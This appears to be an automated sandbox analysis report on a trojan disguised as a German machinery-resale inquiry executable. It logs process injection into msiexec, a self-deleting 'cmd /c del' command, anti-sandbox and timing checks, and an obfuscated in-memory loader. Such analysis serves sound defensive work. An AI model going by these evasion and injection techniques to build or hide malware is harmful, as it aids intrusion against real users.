          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D1B090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D320A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DD20A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DC1002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DDE824
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D0F900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D24120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DD22AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DCDBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D3EBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04DD2B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C9B954
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C9C2CA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C88C90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C9CC68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C82D88
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C82D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C82FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 04D0B150 appears 35 times
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_004185F0 NtCreateFile,
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_004186A0 NtReadFile,
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_00418720 NtClose,
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0041884A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0041869B NtReadFile,
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0041871B NtClose,
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_004187CA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D4AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D4A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D4A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D4B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D4A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D49B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C985F0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C986A0 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C98720 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C9869B NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C9871B NtClose,
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.278490897.0000000007B60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.274186154.0000000000FEE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDateTimeConstantAttrib.exeD vs Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.275323612.0000000004301000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.274786990.0000000003301000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameabzQueueReader.dll> vs Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000002.00000000.271671623.000000000078E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDateTimeConstantAttrib.exeD vs Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000002.00000002.345887480.00000000014EF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000002.00000002.345224756.0000000000E09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000002.00000002.345288224.0000000000E2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000002.00000002.345626782.000000000135F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeBinary or memory string: OriginalFilenameDateTimeConstantAttrib.exeD vs Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeVirustotal: Detection: 31%
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeMetadefender: Detection: 22%
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeReversingLabs: Detection: 61%
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe "C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe"
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess created: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess created: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe"
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@10/5
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: msiexec.pdb source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000002.00000002.345224756.0000000000E09000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000002.00000002.345224756.0000000000E09000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000002.00000002.345369869.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000002.00000002.345626782.000000000135F000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.526451431.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.344894466.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.526983133.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000002.00000002.345369869.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000002.00000002.345626782.000000000135F000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 0000000D.00000002.526451431.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.344894466.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.526983133.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, Game1/Form2.cs.Net Code: SourceOptions contains xor as well as GetObject
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, Game1/Form2.cs.Net Code: IgnoredAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 0_2_07D53607 push eax; retf
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 0_2_07D53E33 push ds; ret
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0041C05C push dword ptr [B2863D0Fh]; ret
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0041B832 push eax; ret
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0041B83B push eax; ret
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0041B8D3 push dword ptr [B2863D0Fh]; ret
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0041B89C push eax; ret
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0041B954 push dword ptr [B2863D0Fh]; ret
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_00415911 pushfd ; ret
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_004091D5 push ss; retf
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_00416193 push ds; retf
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0041C24C push dword ptr [B2863D0Fh]; ret
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0041C2CA push dword ptr [B2863D0Fh]; ret
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0040D2B1 push esp; retf
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0040D2B5 push esp; retf
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0041C647 push dword ptr [B2863D0Fh]; ret
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0041C6FE push dword ptr [B2863D0Fh]; ret
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_0041B7E5 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_04D5D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C9B8D3 push dword ptr [B2863D0Fh]; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C9B89C push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C9C05C push dword ptr [B2863D0Fh]; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C9B83B push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C9B832 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C891D5 push ss; retf
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C96193 push ds; retf
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C9B954 push dword ptr [B2863D0Fh]; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C95911 pushfd ; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C9C2CA push dword ptr [B2863D0Fh]; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C8D2B1 push esp; retf
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00C8D2B5 push esp; retf
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeStatic PE information: 0x90594537 [Fri Sep 28 17:45:27 2046 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.84137262917
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeFile created: \anfrage angebot resale de maschinen interesse nummer 6654229005678.exe
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeFile created: \anfrage angebot resale de maschinen interesse nummer 6654229005678.exe

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: /c del "C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: /c del "C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe"
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: 0.2.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe.337f2ec.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.274786990.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe PID: 6736, type: MEMORYSTR
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.274786990.0000000003301000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.274786990.0000000003301000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe TID: 6740Thread sleep time: -33309s >= -30000s
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe TID: 6764Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3132Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeCode function: 2_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.4 %
